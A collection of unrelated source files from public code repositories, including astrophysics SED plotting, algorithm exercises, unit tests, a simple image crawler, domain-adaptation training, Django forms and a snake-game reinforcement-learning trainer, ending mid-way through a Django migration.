val_s_bandEpeakalpha=covariance_matrix[ip+1,ip+2]\n val_s_bandEpeakbeta=covariance_matrix[ip+1,ip+3]\n val_s_bandalphabeta=covariance_matrix[ip+2,ip+3]\n\n vfBAND_err2 = np.vectorize(fBAND_err2)\n vvfBAND_err2, partialA_band, partialbeta_band, partialalpha_band, partialEpeak_band = vfBAND_err2(vE, val_A, val_Epeak, val_alpha, val_beta, val_s2band_A, val_s2band_Epeak, val_s2band_alpha, val_s2band_beta,val_s_bandAEpeak, val_s_bandAalpha, val_s_bandAbeta, val_s_bandEpeakalpha, val_s_bandEpeakbeta, val_s_bandalphabeta)\n\n SED_BAND_ERR = vE ** 2. 
* np.sqrt(vvfBAND_err2) * keVtoErg\n SED_BAND_high = SED_BAND + SED_BAND_ERR\n SED_BAND_low = SED_BAND - SED_BAND_ERR\n\n if component=='CPL':\n val_A=param_mean[ip]\n val_Epeak=param_mean[ip+1]\n val_index=param_mean[ip+2]\n val_Epiv=param_mean[ip+3]\n\n val_Epiv=100.\n #Epeak\n if base:\n Epeak_array[isim]=val_Epeak\n vfCPL = np.vectorize(fCPL)\n vvfCPL =vfCPL(vE,val_A,val_Epeak,val_index, val_Epiv )\n SED_CPL=vE**2*vvfCPL*keVtoErg\n SED_components.append(SED_CPL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_CPL\n #plot\n plt.loglog(vE[ie_low:ie_high],SED_CPL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A=covariance_matrix[ip,ip]\n val_s2Epeak=covariance_matrix[ip+1,ip+1]\n val_s2index=covariance_matrix[ip+2,ip+2]\n val_s2Epiv=covariance_matrix[ip+3,ip+3]\n val_s_AEpeak=covariance_matrix[ip,ip+1]\n val_s_Aindex=covariance_matrix[ip,ip+2]\n val_s_Epeakindex=covariance_matrix[ip+1,ip+2]\n vfCPL_err2 = np.vectorize(fCPL_err2)\n vvfCPL_err2,partialA_cpl, partialIndex_cpl, partialEpeak_cpl,partialEpiv_cpl = vfCPL_err2(vE, val_A, val_Epeak, val_index, val_Epiv, val_s2A, val_s2Epeak, val_s2index, val_s2Epiv, val_s_AEpeak, val_s_Aindex,\n val_s_Epeakindex)\n\n SED_CPL_ERR = vE ** 2. * np.sqrt(vvfCPL_err2) * keVtoErg\n SED_CPL_high = SED_CPL + SED_CPL_ERR\n SED_CPL_low = SED_CPL - SED_CPL_ERR\n\n if component=='BB':\n val_A=param_mean[ip]\n val_kT=param_mean[ip+1]\n vfBB = np.vectorize(fBB)\n vvfBB=vfBB(vE,val_A,val_kT)\n SED_BB=vE**2*vvfBB*keVtoErg\n SED_components.append(SED_BB) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_BB\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_BB[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A=covariance_matrix[ip,ip]\n val_s2kT=covariance_matrix[ip+1,ip+1]\n val_s_AkT=covariance_matrix[ip,ip+1]\n vfBB_err2 = np.vectorize(fBB_err2)\n vvfBB_err2,partialA_bb, partialkT_bb = vfBB_err2(vE, val_A, val_kT, val_s2A, val_s2kT, val_s_AkT)\n\n SED_BB_ERR = vE ** 2 * np.sqrt(vvfBB_err2) * keVtoErg\n SED_BB_high = SED_BB + SED_BB_ERR\n SED_BB_low = SED_BB - SED_BB_ERR\n\n ip=ip+Nparameters[ic] \n\nerrs = 0.\nfor iparam1 in range (sum(Nparameters)):\n param1 = parnames[iparam1]\n for iparam2 in range(sum(Nparameters)):\n param2 = parnames[iparam2]\n sigmaparam = covariance_matrix[iparam1,iparam2]\n #print(param1, param2, sigmaparam)\n errs = errs+(eval('partial'+param1))*(eval('partial'+param2))*sigmaparam\n\ntotalerrs = vE**2*np.sqrt(errs)*keVtoErg\ntotalerrs_high = SED_sum+ totalerrs\ntotalerrs_low = SED_sum- totalerrs\n\n\n\nif OPT_SHADE:\n plt.fill_between(vE[ie_low:ie_high], totalerrs_high[ie_low:ie_high], totalerrs_low[ie_low:ie_high], color=color10, alpha=.25)\n plt.loglog(vE[ie_low:ie_high],totalerrs_high[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.3)\n plt.loglog(vE[ie_low:ie_high],totalerrs_low[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.3)\nelse:\n plt.loglog(vE[ie_low:ie_high],totalerrs_high[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.7)\n plt.loglog(vE[ie_low:ie_high],totalerrs_low[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.7)\n print('')\nplt.loglog(vE[ie_low:ie_high],SED_sum[ie_low:ie_high],model_linestyle, 
linewidth=totalmodel_linewidth,label=str_label,c=color10)\n\n\nplt.legend()","repo_name":"khadeejah-motiwala/SEDErrorCalculationTool","sub_path":"multiple_SEDs_loop.py","file_name":"multiple_SEDs_loop.py","file_ext":"py","file_size_in_byte":25002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"26044504222","text":"class Solution:\n def search(self, arr, target: int) -> int:\n '''\n First scan the array for its sorted sub-intervals, then binary-search each candidate interval, storing the index positions of the target within it.\n '''\n left, right = 0, 1\n record = []\n while right <= len(arr):\n if right < len(arr) - 1 and arr[right] >= arr[right - 1]:\n right += 1\n else:\n if target >= arr[left] and target <= arr[right-1]:\n if self.binary(arr, target, left, right-1):\n record.append(self.binary(arr, target, left, right-1))\n left = right\n right += 1\n return sorted(record, key=lambda x:x[0])[0][1] if record else -1\n\n def binary(self, arr, target, left, right):\n l, r = left, right\n while l < r:\n mid = int((l + r) / 2)\n if arr[mid] == target:\n r = mid\n elif arr[mid] < target:\n l = mid + 1\n else:\n r = mid - 1\n if arr[l] == target:\n return [l - left, l]\n else:\n return False","repo_name":"dc-huyf/algorithm","sub_path":"排序&二分/#面试题 10.03 搜索旋转数组.py","file_name":"#面试题 10.03 搜索旋转数组.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}{"seq_id":"41003408538","text":"import unittest\n\nfrom tracetools_analysis.processor import Dependant\nfrom tracetools_analysis.processor import DependencySolver\n\n\nclass DepEmtpy(Dependant):\n\n def __init__(self, **kwargs) -> None:\n self.myparam = kwargs.get('myparam', None)\n\n\nclass DepOne(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepEmtpy]\n\n\nclass DepOne2(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepEmtpy]\n\n\nclass DepTwo(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepOne, DepOne2]\n\n\nclass TestDependencySolver(unittest.TestCase):\n\n def __init__(self, *args) -> None:\n super().__init__(\n *args,\n )\n\n def test_single_dep(self) -> None:\n depone_instance = DepOne()\n\n # DepEmtpy should be added before\n solution = DependencySolver(depone_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIs(solution[1], depone_instance)\n\n def test_single_dep_existing(self) -> None:\n depempty_instance = DepEmtpy()\n depone_instance = DepOne()\n\n # Already in order\n solution = DependencySolver(depempty_instance, depone_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIs(solution[0], depempty_instance, 'wrong solution order')\n self.assertIs(solution[1], depone_instance, 'wrong solution order')\n\n # Out of order\n solution = DependencySolver(depone_instance, depempty_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIs(solution[0], depempty_instance, 'solution does not use existing instance')\n self.assertIs(solution[1], depone_instance, 'solution does not use existing instance')\n\n def test_duplicate_dependency(self) -> None:\n deptwo_instance = DepTwo()\n\n # DepOne and DepOne2 both depend on DepEmpty\n solution = DependencySolver(deptwo_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n 
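# NOTE (added commentary, not part of the captured test): DepTwo depends on
# DepOne and DepOne2, which both depend on DepEmtpy; the solver must create
# that shared dependency exactly once and place it first, which is what the
# element-by-element assertions in this test check.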
self.assertIs(solution[3], deptwo_instance)\n\n # Existing instance of DepEmpty, in order\n depempty_instance = DepEmtpy()\n solution = DependencySolver(depempty_instance, deptwo_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n self.assertIs(solution[3], deptwo_instance)\n\n # Existing instance of DepEmpty, not in order\n solution = DependencySolver(deptwo_instance, depempty_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n self.assertIs(solution[3], deptwo_instance)\n\n def test_kwargs(self) -> None:\n depone_instance = DepOne()\n\n # Pass parameter and check that the new instance has it\n solution = DependencySolver(depone_instance, myparam='myvalue').solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertEqual(solution[0].myparam, 'myvalue', 'parameter not passed on') # type: ignore\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"azu-lab/ROS2-E2E-Evaluation","sub_path":"autoware_perf_galactic/tracetools_analysis-galactic_add_tp/tracetools_analysis/test/tracetools_analysis/test_dependency_solver.py","file_name":"test_dependency_solver.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"30871978054","text":"import os\nimport StringIO\nimport tarfile\n\nimport numpy\n\nfrom MDANSE import REGISTRY\nfrom MDANSE.Framework.Formats.IFormat import IFormat\n\nclass ASCIIFormat(IFormat):\n '''\n This class handles the writing of output variables in ASCII format. Each output variable is written into separate ASCII files which are further\n added to a single archive file. \n '''\n \n extension = \".dat\"\n\n extensions = ['.dat','.txt']\n \n @classmethod\n def write(cls, filename, data, header=\"\"):\n '''\n Write a set of output variables into a set of ASCII files.\n \n Each output variable will be output in a separate ASCII file. 
All the ASCII files will be compressed into a tar file.\n \n :param filename: the path to the output archive file that will contain the ASCII files written for each output variable.\n :type filename: str\n :param data: the data to be written out.\n :type data: dict of Framework.OutputVariables.IOutputVariable\n :param header: the header to add to the output file.\n :type header: str\n '''\n \n filename = os.path.splitext(filename)[0]\n filename = \"%s_ascii.tar\" % filename\n\n tf = tarfile.open(filename,'w')\n \n for var in data.values():\n tempStr = StringIO.StringIO()\n tempStr.write(var.info())\n tempStr.write('\\n\\n') \n cls.write_data(tempStr,var,data)\n tempStr.seek(0)\n\n info = tarfile.TarInfo(name='%s%s' % (var.varname,cls.extensions[0]))\n info.size=tempStr.len\n tf.addfile(tarinfo=info, fileobj=tempStr)\n \n if header:\n tempStr = StringIO.StringIO()\n tempStr.write(header)\n tempStr.write('\\n\\n') \n tempStr.seek(0)\n info = tarfile.TarInfo(name='jobinfo.txt')\n info.size=tempStr.len\n tf.addfile(tarinfo=info, fileobj=tempStr)\n \n tf.close()\n\n @classmethod\n def write_data(cls, fileobject, data, allData):\n '''\n Write a Framework.OutputVariables.IOutputVariable into a file-like object\n \n :param fileobject: the file object where the output variable should be written.\n :type fileobject: python file-like object\n :param data: the output variable to write (subclass of NumPy array).\n :type data: Framework.OutputVariables.IOutputVariable\n :param allData: the complete set of output variables\n :type allData: dict of Framework.OutputVariables.IOutputVariable\n \n :attention: this is a recursive method.\n '''\n \n if data.ndim > 2:\n fileobject.write(\"Can not write ASCII output for data of dimensionality > 2\")\n\n elif data.ndim == 2:\n xData,yData = data.axis.split(\"|\")\n\n if xData == \"index\":\n xValues = numpy.arange(data.shape[0])\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (xData,\"au\"))\n else:\n xValues = allData[xData]\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (allData[xData].varname,allData[xData].units))\n\n if yData == \"index\":\n yValues = numpy.arange(data.shape[1])\n fileobject.write(\"# 1st row: %s (%s)\\n\\n\"% (yData,\"au\"))\n else:\n yValues = allData[yData]\n fileobject.write(\"# 1st row: %s (%s)\\n\\n\"% (allData[yData].varname,allData[yData].units))\n\n zData = numpy.zeros((data.shape[0]+1,data.shape[1]+1),dtype=numpy.float)\n zData[1:,0] = xValues\n zData[0,1:] = yValues\n zData[1:,1:] = data\n\n numpy.savetxt(fileobject,zData)\n fileobject.write('\\n')\n\n else:\n xData = data.axis.split(\"|\")[0]\n\n if xData == \"index\":\n xValues = numpy.arange(data.size)\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (xData,\"au\"))\n else:\n xValues = allData[xData]\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (allData[xData].varname,allData[xData].units))\n\n fileobject.write(\"# 2nd column: %s (%s)\\n\\n\"% (data.varname,data.units))\n\n numpy.savetxt(fileobject,numpy.column_stack([xValues,data]))\n fileobject.write('\\n')\n\nREGISTRY['ascii'] = ASCIIFormat\n","repo_name":"RastislavTuranyi/MDANSE","sub_path":"Src/Framework/Formats/ASCIIFormat.py","file_name":"ASCIIFormat.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"}{"seq_id":"7185782925","text":"\ndef func_verificadora(email):\n comp = email.split(\"@\") # Components\n if not len(comp) == 2: # Exactly one \"@\"\n return False\n if not comp[0] or not comp[1]: # Parts before and after the @ must not be 
empty\n return False\n dom = comp[1].split(\".\") # Sub-domains\n if not dom[-1] == \"cl\": # Only Chilean (.cl) domains\n return False\n for d in dom:\n # No sub-domain may be empty.\n # Dots are assumed to separate sub-domains.\n if not d:\n return False\n return True\n","repo_name":"IIC2233-2015-1/syllabus","sub_path":"Pautas Interrogaciones/I2/P5/P5_I2a.py","file_name":"P5_I2a.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"}{"seq_id":"10398250963","text":"#!/usr/bin/python\nimport re\nimport os\nimport sys\nimport pyclbr\nfrom io import open\n\ndef find_lcmtypes():\n alpha_chars = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n valid_chars = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_\")\n lcmtypes = []\n regex = re.compile(\"_get_packed_fingerprint\")\n \n dirs_to_check = sys.path\n\n for dir_name in dirs_to_check:\n for root, dirs, files in os.walk(dir_name):\n subdirs = root[len(dir_name):].split(os.sep)\n subdirs = [ s for s in subdirs if s ]\n\n python_package = \".\".join(subdirs)\n\n for fname in files:\n if not fname.endswith(\".py\"):\n continue\n \n mod_basename = fname[:-3]\n valid_modname = True\n for c in mod_basename:\n if c not in valid_chars:\n valid_modname = False\n break\n if mod_basename[0] not in alpha_chars:\n valid_modname = False\n if not valid_modname:\n continue\n\n # quick regex test -- check if the file contains the \n # word \"_get_packed_fingerprint\"\n full_fname = os.path.join(root, fname)\n try: \n contents = open(full_fname, \"r\", encoding='latin1').read()\n # contents = open(full_fname, \"r\").read()\n except IOError:\n continue\n if not regex.search(contents):\n continue\n \n # More thorough check to see if the file corresponds to a\n # LCM type module generated by lcm-gen. 
Parse the \n # file using pyclbr, and check if it contains a class\n # with the right name and methods\n if python_package:\n modname = \"%s.%s\" % (python_package, mod_basename)\n else:\n modname = mod_basename\n try:\n klass = pyclbr.readmodule(modname)[mod_basename]\n if \"decode\" in klass.methods and \\\n \"_get_packed_fingerprint\" in klass.methods:\n\n lcmtypes.append(modname)\n except ImportError:\n continue\n except KeyError:\n continue\n\n # only recurse into subdirectories that correspond to python \n # packages (i.e., they contain a file named \"__init__.py\")\n subdirs_to_traverse = [ subdir_name for subdir_name in dirs \\\n if os.path.exists(os.path.join(root, subdir_name, \"__init__.py\")) ]\n del dirs[:]\n dirs.extend(subdirs_to_traverse)\n return lcmtypes\n\ndef make_lcmtype_dictionary():\n \"\"\"Create a dictionary of LCM types keyed by fingerprint.\n\n Searches the specified python package directories for modules \n corresponding to LCM types, imports all the discovered types into the\n global namespace, and returns a dictionary mapping packed fingerprints\n to LCM type classes.\n\n The primary use for this dictionary is to automatically identify and \n decode an LCM message.\n\n \"\"\"\n lcmtypes = find_lcmtypes()\n\n result = {}\n\n for lcmtype_name in lcmtypes:\n try:\n __import__(lcmtype_name)\n mod = sys.modules[lcmtype_name]\n type_basename = lcmtype_name.split(\".\")[-1]\n klass = getattr(mod, type_basename)\n fingerprint = klass._get_packed_fingerprint()\n result[fingerprint] = klass\n #print \"importing %s\" % lcmtype_name\n except:\n print(\"Error importing %s\" % lcmtype_name)\n return result\n \nif __name__ == \"__main__\":\n import binascii\n print(\"Searching for LCM types...\")\n lcmtypes = make_lcmtype_dictionary()\n num_types = len(lcmtypes)\n print(\"Found %d type%s\" % (num_types, num_types==1 and \"\" or \"s\"))\n for fingerprint, klass in lcmtypes.items():\n print(binascii.hexlify(fingerprint), klass.__module__)\n","repo_name":"mit-biomimetics/Cheetah-Software","sub_path":"scripts/lcm-log2smat/python/lcmlog2smat/scan_for_lcmtypes.py","file_name":"scan_for_lcmtypes.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2179,"dataset":"github-code","pt":"79"} +{"seq_id":"32501136297","text":"import socket\nimport re\nimport os\n\ndef RequeseG3t(url):\n s0cket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n pathArr = url.split(\"/\")\n \n portnumber = 80\n\n host = pathArr[2]\n\n\n try:\n s0cket.settimeout(20)\n s0cket.connect((host, portnumber))\n except socket.timeout as e:\n print(\"timed out o╥﹏╥o\")\n request = 'GET ' + url + ' HTTP/1.1\\r\\nHost: ' + pathArr[2] + '\\r\\nConnection: closed\\r\\n\\r\\n'\n print(request)\n\n s0cket.send(request.encode())\n\n Buffer = []\n while True:\n d = s0cket.recv(1024)\n \n Buffer.append(d)\n if len(d) <= 0:\n break\n\n data = b''.join(Buffer)\n s0cket.close()\n return data.split(b\"\\r\\n\\r\\n\")[1]\n\n\n\n\ndef gettheURL(url):\n \n \n rg = r'href = \"(.+?)\"'\n web = RequeseG3t(url).decode()\n hrefofRe = re.compile(rg)\n hreflist = re.findall(hrefofRe, web)\n \n urlGroup = []\n n = 0\n for hrefurl in hreflist:\n if hreflist[n][0:1] == \"/\":\n hrefurl = url + hreflist[n][1:]\n pathArr = url.split(\"/\")\n hostName = pathArr[2]\n hrefurl = \"http://\" + hostName + \"/\" + hreflist[n][1:] + \"/\"\n else:\n hrefurl = url + hreflist[n] + \"/\"\n \n\n n = n + 1\n urlGroup.append(hrefurl)\n\n print(\"catch %d new links\" % len(urlGroup))\n print(\"done\")\n 
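# NOTE (added commentary, not part of the captured crawler): urlGroup now holds
# one absolute URL per extracted href; hrefs starting with '/' were re-rooted
# at the page's host above, and all others were appended to the page URL.
# Duplicates are only pruned later, when the caller invokes the urlGroup
# class's remove(), which wraps list(set(...)).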
return urlGroup\n\ndef picturecatch(url):\n\n web = RequeseG3t(url).decode()\n \n rg1 = r'src = \"(.+?\\.jpg)\"'\n pic1 = re.compile(rg1)\n piclist1 = re.findall(pic1, web)\n\n rg2 = r'src = \"(.+?\\.gif)\"'\n pic2 = re.compile(rg2)\n piclist2 = re.findall(pic2, web)\n\n rg3 = r'src = \"(.+?\\.jpeg)\"'\n pic3 = re.compile(rg3)\n piclist3 = re.findall(pic3, web)\n\n rg4 = r'src = \"(.+?\\.png)\"'\n pic4 = re.compile(rg4)\n piclist4 = re.findall(pic4, web)\n\n rg5 = r'src = \"(.+?\\.webp)\"'\n pic5 = re.compile(rg5)\n piclist5 = re.findall(pic5, web)\n\n piclist = piclist1 + piclist2 + piclist3 + piclist4 + piclist5\n print(piclist)\n\n for picurl in piclist:\n\n i1 = picurl.rfind('.', 0, len(picurl))\n i2 = picurl.rfind('/', 0, len(picurl))\n picFormat = picurl[i1:]\n picName = picurl[i2 + 1:i1]\n\n if picurl[0:1] == \"/\":\n pathArr = url.split(\"/\")\n hostName = pathArr[2]\n picpath = \"http://\" + hostName + picurl\n else:\n picpath = url + picurl\n\n\n if not os.path.exists(os.getcwd() + \"/\" + url[7:]):\n os.makedirs(os.getcwd() + \"/\" + url[7:])\n print(\"the folder is built \")\n else:\n print(\"the folder has existed.\")\n\n picData = RequeseG3t(picpath)\n\n fileName = os.getcwd() + \"/\" + url[7:] + picName + picFormat\n print(fileName)\n f = open(fileName, 'wb')\n f.write(picData)\n f.close()\n\n print(\"success ヾ(゚∀゚ゞ) !!!\")\n\nclass urlGroup:\n def __init__(self):\n self.urlGroup = []\n\n def append(self, obj):\n self.urlGroup.append(obj)\n\n def list(self):\n return self.urlGroup\n\n def print_list(self):\n print(self.urlGroup)\n\n def __len__(self):\n return len(self.urlGroup)\n\n def remove(self):\n self.urlGroup = list(set(self.urlGroup))\n\n\n\n\ndef depth(url, currentingDepth, maxedDepth):\n print(\"The current depth is: \", currentingDepth)\n if maxedDepth == currentingDepth:\n print(\"The url which is belong to current depth: \", url)\n else:\n urlGroup1.append(url)\n newurlGroup = gettheURL(url)\n for eachUrl in newurlGroup:\n urlGroup1.append(eachUrl)\n\n print(\"------\")\n for url in newurlGroup:\n depth(url, currentingDepth + 1, maxedDepth)\n\n\n\n\nurlGroup1 = urlGroup()\n\ndepth(\"http://csse.xjtlu.edu.cn/classes/CSE205/\", 0, 3)\n\nurlGroup1.remove()\nprint(urlGroup1.__len__())\nprint(urlGroup1.list())\nprint(os.getcwd())\nfor eachUrl in urlGroup1.list():\n picturecatch(eachUrl)\n\n","repo_name":"MinglangTuo/ImageCrawler","sub_path":"catchpictures.py","file_name":"catchpictures.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15345553612","text":"import os\nimport yaml\nimport argparse\nimport warnings\n\nfrom utils import load_model, visualize\nfrom core import source_only, dann, test\nfrom datasets import get_mnist, get_mnistm\nfrom models import Extractor, Classifier, Discriminator\n\n\nMODE_MAP = {'source-only': 'Source-Only', 'dann': 'DANN'}\nDATASETS_MAP = {'mnist': 'get_mnist', 'mnistm': 'get_mnistm'}\n\n\n# Ignore warnings\nwarnings.filterwarnings(action='ignore')\n\n\ndef get_args():\n \"\"\" Get the arguments for training and test \"\"\"\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--source', type=str, default='mnist', choices=DATASETS_MAP.keys(), help='Source datasets')\n parser.add_argument('--target', type=str, default='mnistm', choices=DATASETS_MAP.keys(), help='Target datasets')\n parser.add_argument('--mode', type=str, default='dann', choices=MODE_MAP.keys(), help='Training mode')\n parser.add_argument('--train', 
action='store_true', help='Train the models')\n parser.add_argument('--extractor', type=str, default=None, help='Extractor\\'s weights file')\n parser.add_argument('--classifier', type=str, default=None, help='Classifier\\'s weights file')\n\n args = parser.parse_args()\n return args\n\n\ndef main(args):\n \"\"\" The main function \"\"\"\n\n # Get the parameters\n config = yaml.load(open('config.yaml'))\n\n # Get the datasets\n train_source_loader = eval(DATASETS_MAP[args.source])(train=True)\n train_target_loader = eval(DATASETS_MAP[args.target])(train=True)\n test_source_loader = eval(DATASETS_MAP[args.source])(train=False)\n test_target_loader = eval(DATASETS_MAP[args.target])(train=False)\n\n # Get the models\n extractor = Extractor(**config['extractor'])\n classifier = Classifier(**config['classifier'])\n discriminator = Discriminator(**config['discriminator'])\n \n # Training\n if args.train:\n if args.mode == 'source-only':\n extractor, classifier = source_only(extractor, classifier, train_source_loader)\n else:\n extractor, classifier = dann(extractor, classifier, discriminator, train_source_loader, train_target_loader)\n\n # Load the models\n else:\n assert args.extractor != None, 'If train is False, you have to input the weights file.'\n assert args.classifier != None, 'If train is False, you have to input the weights file.'\n\n ext_filepath = os.path.join(config['save'], args.extractor)\n cls_filepath = os.path.join(config['save'], args.classifier)\n\n assert os.path.exists(ext_filepath), 'There is no {}'.format(ext_filepath)\n assert os.path.exists(cls_filepath), 'There is no {}'.format(cls_filepath)\n\n extractor = load_model(extractor, args.extractor)\n classifier = load_model(classifier, args.classifier)\n\n # Test\n print('\\nTest Result with Source Datasets on {}\\n'.format(MODE_MAP[args.mode]))\n test(extractor, classifier, test_source_loader)\n\n print('\\nTest Result with Target Datasets on {}\\n'.format(MODE_MAP[args.mode]))\n test(extractor, classifier, test_target_loader)\n\n # Visualization\n print('\\nVisualizing...\\n')\n visualize(extractor, test_source_loader, test_target_loader, MODE_MAP[args.mode] + '.png')\n\n print('Done!')\n \n\nif __name__ == '__main__':\n args = get_args()\n main(args)","repo_name":"enpko52/pytorch_DANN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"74108075135","text":"from django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\n\nfrom shoppingcart.models import Category, Item, Order\n\n\nclass OrderForm(ModelForm):\n def clean(self):\n cleaned_data = super(OrderForm, self).clean()\n delivery_option = cleaned_data.get(\"delivery_option\")\n distance_from_shop = cleaned_data.get(\"distance_from_shop\")\n shipping_address = cleaned_data.get(\"shipping_address\")\n\n if delivery_option == \"HMD\":\n if shipping_address != \"\" and distance_from_shop >= 0:\n pass\n elif not (distance_from_shop and shipping_address):\n raise ValidationError(\"Wrong delivery option\")\n\n class Meta:\n model = Order\n fields = [\n \"customer_name\",\n \"customer_mobile_no\",\n \"payment_method\",\n \"delivery_option\",\n \"distance_from_shop\",\n \"shipping_address\",\n ]\n\n\nclass ItemForm(ModelForm):\n class Meta:\n model = Item\n fields = [\n \"name\",\n \"category\",\n \"original_price\",\n \"discount_price\",\n \"weight_in_gms\",\n \"available\",\n ]\n\n\nclass 
CategoryForm(ModelForm):\n class Meta:\n model = Category\n fields = [\n \"name\",\n ]\n","repo_name":"chttrjeankr/shopping-cart","sub_path":"Hard/solution/shoppingcart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1761669713","text":"import snake\nimport agent\nimport numpy as np\n\n\ndef get_state(location_history, food_location):\n state = [([0] * 3) for i in range(49)]\n state[location_history[-1]][0] = 1 # location of head\n for location in location_history[0:-1]:\n state[location][1] = 1 # location of body\n state[food_location][2] = 1\n state = np.array(state).flatten()\n\n board = [0] * 49\n length = len(location_history)\n for n, i in enumerate(location_history):\n board[i] = ((length / 100) - 1) - ((n + 1) / 100)\n board[food_location] = 1\n return np.array([state]), np.array([board])\n\n\ndef get_event(location_history, food_location):\n possible_actions = 4\n events = []\n state, _ = get_state(location_history, food_location)\n game_e = snake.snake()\n for action in range(possible_actions):\n game_e.location_history = location_history[:]\n game_e.food_location = food_location\n game_e.snake_length = max(len(location_history), 3)\n result = game_e.play(action)\n reward = get_reward(result)\n if reward == -1:\n done = True\n events.append([None, action, reward, None, done])\n else:\n next_state, _ = get_state(game_e.location_history, game_e.food_location)\n done = False\n events.append([None, action, reward, next_state[:], done])\n\n events[0][0] = state\n return events\n\n\ndef get_reward(result):\n if 'move' in result:\n return 0\n if 'food' in result:\n return 1\n if 'invalid' in result:\n return -1\n\n\ndef test(model):\n game_test = snake.snake()\n end = False\n move = 0\n while not end:\n current_food = game_test.food_location\n state, _ = get_state(game_test.location_history, game_test.food_location)\n prediction = model.predict(state)[0]\n action = np.argmax(prediction)\n result = game_test.play(action)\n print(f' {int(prediction[0]*1000)}')\n print(f'{int(prediction[1]*1000)} {move} {int(prediction[3]*1000)}')\n print(f' {int(prediction[2]*1000)}')\n game_test.print_board()\n if current_food != game_test.food_location:\n move = 0\n else:\n move += 1\n if result == 'invalid' or move > 50:\n end = True\n\n\ndef train():\n ai = agent.Agent(147, 4, model_name=name)\n game_n = 0\n while True:\n game = snake.snake()\n end = False\n move = 0\n game_n += 1\n print(game_n, len(ai.memory), end='\\r')\n while not end:\n current_history = game.location_history[:]\n current_food = game.food_location\n state, board = get_state(current_history, current_food)\n action = ai.act(state, board)\n result = game.play(action)\n ai.memory.append(get_event(current_history, current_food))\n if current_food != game.food_location:\n move = 0\n else:\n move += 1\n if result == 'invalid' or move > 50:\n end = True\n if game_n % 3000 == 0:\n ai.exp_replay()\n test(ai.model)\n ai.model.save(f'model/{name}_{game_n}')\n\n\nname = 'd'\ntrain()\n","repo_name":"thinhpham2122/snake_ai","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29304270432","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef add_sessions(apps, schema_editor):\n Session = 
